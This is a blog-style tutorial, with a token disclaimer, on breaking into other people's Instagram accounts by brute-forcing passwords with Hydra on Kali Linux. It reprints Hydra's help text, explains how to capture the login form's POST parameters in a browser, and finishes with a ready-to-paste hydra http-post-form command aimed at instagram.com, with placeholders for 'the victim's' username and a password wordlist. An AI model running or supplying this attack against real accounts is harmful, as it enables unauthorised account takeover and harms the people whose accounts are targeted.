Bruteforce instagram using hydra

 Hello fellas, today we are going to learn how we can easily hack Instagram accounts using one of my favorite tools Kali Linux with "Hydra". A great combination isn't it ?

There are well-known methods for cracking passwords over the internet. There are several ways as well as several sources by which you can crack/hack passwords. Some of the examples are phishing attacks, rainbow attacks, Guessing, Malware, and yes of course the Bruteforce attack.

And yes we are going to use the Bruteforce attack in this method. We will be using Kali Linux along with hydra ( a great tool for password cracking) to hack Instagram accounts.

Disclaimer: Hacking is a crime. The tutorial provided in this post was for educational purposes only Do not use it for any illegal purposes. This is for educational purposes only. 

Why Bruteforce only?

There are various kinds of attack schemes, to which passwords are vulnerable to their strength and power. The most popular of these kinds of credential attacks is brute force.

It is a process, method, or algorithm in which your machine/device uses a combination of characters, numbers, and alphabets to guess the right password of the victim. Once the right combination matches it displays the password of the victim on your screen.

What is hydra

                                                                   

Hydra is one of the most popular tools. It has absolute strength to crack passwords, this tool is well known for its flexibility and speed. It is the fastest login cracker that supports numerous protocols. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely.

Hydra was written by van Hauser and is additionally supported by David Maciejak. In the latest update hydra development is moved to the public GitHub repository at: https://github.com/vanhauser-thc/thc-hydra.

Hydra was tested to compile on Linux, Windows/Cygwin, Solaris 11, FreeBSD 8.1, OpenBSD, OSX, QNX/Blackberry, and is made available under GPLv3 with a special OpenSSL license expansion.

List of protocols that THC Hydra supports.

Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC, and XMPP.

Installing Hydra

Hydra comes pre-installed in Kali Linux, you don't need to download it. But for other Linux platforms, you may need to install it additionally or you may even need to install all the libraries and packages. Since this post is particularly for Kali Linux, we assume you are using Kali Linux only and all dependencies are already installed in it.

Open a terminal and just type hydra in a terminal and it will display the help list as follows :

root@kali:~# hydra -h
Hydra v8.6 (c)2017 by van Hauser/THC & David Maciejak - for legal purposes only
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server[:PORT][/OPT]]
Options:
  -R        restore a previous aborted/crashed session
  -S        perform an SSL connect
  -s PORT   if the service is on a different default port, define it here
  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help
  -e nsr    try "n" null password, "s" login as pass and/or "r" reversed login
  -u        loop around users, not passwords (effective! implied with -x)
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -M FILE   list of servers to be attacked in parallel, one entry per line
  -o FILE   write found login/password pairs to FILE instead of stdout
  -f / -F   exit when a login/pass pair is found (-M: -f per host, -F global)
  -t TASKS  run TASKS number of connects in parallel (per host, default: 16)
  -w / -W TIME  waittime for responses (32s) / between connects per thread
  -4 / -6   prefer IPv4 (default) or IPv6 addresses
  -v / -V / -d  verbose mode / show login+pass for each attempt / debug mode
  -U        service module usage details
  server    the target server (use either this OR the -M option)
  service   the service to crack (see below for supported protocols)
  OPT       some service modules support additional input (-U for module help)
Supported services: asterisk afp cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql ncp nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp rexec rlogin rsh s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
Hydra is a tool to guess/crack valid login/password pairs - usage only allowed 
for legal purposes. This tool is licensed under AGPL v3.0.
The newest version is always available at http://www.thc.org/thc-hydra
These services were not compiled in: sapr3 oracle.
Use HYDRA_PROXY_HTTP or HYDRA_PROXY - and if needed HYDRA_PROXY_AUTH - environment for a proxy setup.
E.g.:  % export HYDRA_PROXY=socks5://127.0.0.1:9150 (or socks4:// or connect://)
       % export HYDRA_PROXY_HTTP=http://proxy:8080
       % export HYDRA_PROXY_AUTH=user:pass
Examples:
  hydra -l user -P passlist.txt ftp://192.168.0.1
  hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
  hydra -C defaults.txt -6 pop3s://[fe80::2c:31ff:fe12:ac11]:143/TLS:DIGEST-MD5
  hydra -l admin -p password ftp://[192.168.0.0/24]/
  hydra -L logins.txt -P pws.txt -M targets.txt ssh

Bruteforce web-based login with hydra

Hydra supports some brute-forcing services as mentioned earlier, one of them is used to brute-force web-based logins such as social media login form, user banking login form, your router web-based login, etc. That “http[s]-{get|post}-form” which will handle this request. In this post, we will learn how to bruteforce Instagram accounts. Before we fire up hydra we should know some needed arguments such as below:

• Target : https://www.instagram.com/
• Login username : username of the victim
• Password list : “The location of dictionary file list containing possible passwords.”
• Form parameters : “for general, use tamper data or proxy to obtain form of request parameters. But here im using iceweasel, firefox based, network developer toolbar.”
• Service module : http-post-form

Obtaining post parameters using a browser, Iceweasel/firefox

Note:- If you don't understand this part or anything simply skip it, there is no need to understand every single step in order to make this hack happen. Just move to the final step.

In your firefox browser press keys ‘CTRL + SHIFT + Q‘. Then open the web login page https://www.instagram.com/, you will notice some text appear on the network developer tab. It tells you what files are transferred to us. See the method all are GET, since we have not POST any data yet.

Help for module http-post-form:
============================================================================
Module http-post-form requires the page and the parameters for the web form.

By default this module is configured to follow a maximum of 5 redirections in
a row. It always gathers a new cookie from the same URL without variables
The parameters take three ":" separated values, plus optional values.
(Note: if you need a colon in the option string as value, escape it with "\:", 
but do not escape a "\" with "\\".)

Syntax:

[url]:[form parameters]:[condition string][:(optional)[:(optional)]
First is the page on the server to GET or POST to (URL). 
Second is the POST/GET variables (taken from either the browser, proxy, etc. 
with usernames and passwords being replaced in the "^USER^" and "^PASS^" 
placeholders (FORM PARAMETERS) Third is the string that it checks for an *invalid* login (by default) 
Invalid condition login check can be preceded by "F=", 
successful condition login check must be preceded by "S=". 
This is where most people get it wrong. You have to check the webapp what a failed string looks like 
and put it in this parameter! The following parameters are optional: 
C=/page/uri to define a different page to gather initial cookies from 
(h|H)=My-Hdr\: foo to send a user defined HTTP header with each request ^USER^ and ^PASS^ 
can also be put into these headers! 
Note: 'h' will add the user-defined header at the end regardless it's already being sent by Hydra or not. 
'H' will replace the value of that header if it exists, by the one supplied by the user, 
or add the header at the end Note that if you are going to put colons (:) 
in your headers you should escape them with a backslash (\). 
All colons that are not option separators should be escaped (see the examples above and below). 
You can specify a header without escaping the colons, but that way you will not be able to put colons 
in the header value itself, as they will be interpreted by hydra as option separators.

To obtain the post-form parameters, type whatever in the username and or password form. You will notice a new POST method on the network developer tab. Double click on that line, on the “Headers” tab, click the “Edit and Resend” button on right side. On the Request Body copy the last line, such as “/:username=^USER^&password=^PASS^”. the “ USER" and “ PASS" are parameters we need. As seen below:

Kali Linux has bunch of wordlists, choose the appropriate wordlist or download your own custom dictionary from the internet. And also you can use the pre installed kali linux wordlist as show in the image, you need to locate it and unzip it using these commands as shown in the image

The final Step

Alright, now we got all arguments we need and are ready to fire up hydra. Here is the command pattern:

hydra -l <username> -P <password list> <Target hostname> <service module> <post request parameters>[/code]
Finally, based on information we have gathered, our commands ahould look something like this:
hydra -l (username of your) victim -P (set path of your dictionary) instagram.com https-post-form "/:username=^USER^&password=^PASS^:Sorry, your password was incorrect. Please double-check your password." -vV -f

• l <username> : is a word containing username account, use -L <FILE> to refer list of possible user name in a file.
• P <FILE> : is a file list of possible password, use -p <password> to literally use one word password instead of guess it.
• instagram.com: is a hostname or target
• http-post-form : is the service module we use
• "/:username=^USER^&password=^PASS^:Sorry, your password was incorrect. Please double-check your password." = the 3 parameters needed, the syntax is :
  {page URL}:{Request post body form parameters}:{Find whatever on the page after successfully logged in}
• v = Verbose mode
• V = show login:pass for each attempt
• f = Terminate program if pair login:password is found

Summary

In more simple words, without making you guys suffer, from all the terrible information above you can just copy and paste this command into your terminal and just replace two things, the path to your dictionary and the username of the victim.

hydra -l (username of your) victim -P (set path of your dictionary) instagram.com https-post-form "/:username=^USER^&password=^PASS^:Sorry, your password was incorrect. Please double-check your password." -vV -f

Now grab a coffee and wait unless hydra does its work. You have to be patience as it is a bruteforce attack and it needs time. Once you succeed in finding a pair of the login: password hydra will immediately terminate the job and show the valid credential.